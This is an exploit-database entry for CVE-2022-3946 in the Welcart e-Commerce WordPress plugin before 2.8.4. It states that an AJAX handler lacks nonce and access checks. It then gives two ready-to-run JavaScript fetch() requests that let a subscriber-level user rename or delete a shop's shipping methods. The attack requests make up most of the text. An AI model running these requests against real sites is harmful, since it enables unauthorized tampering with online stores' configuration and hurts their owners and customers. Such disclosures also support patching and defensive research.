Exploit for Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion CVE-2022-3946

Name: Exploit for Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion CVE-2022-3946
Rating: 5 (96 reviews)

2022-11-21 | CVSS 1.2

## https://sploitus.com/exploit?id=WPEX-ID:B48E4E1D-E682-4B16-81DC-2FEEE78D7ED0
wp_ajax_shop_options_ajax hook calls shop_options_ajax() function without nonce and without access control

update shipping method name (#0 shipping method id) exploit:

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=shop_options_ajax&mode=update_delivery_method&name=UPDATE&id=0&time=&charge=-1&days=-1&nocod=0&intl=0&cool_category=0'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

The exploit requires at least a subscriber role.

---

delete shipping method (#0 shipping method id) exploit:

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=shop_options_ajax&mode=delete_delivery_method&id=0'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

The exploit requires at least a subscriber role.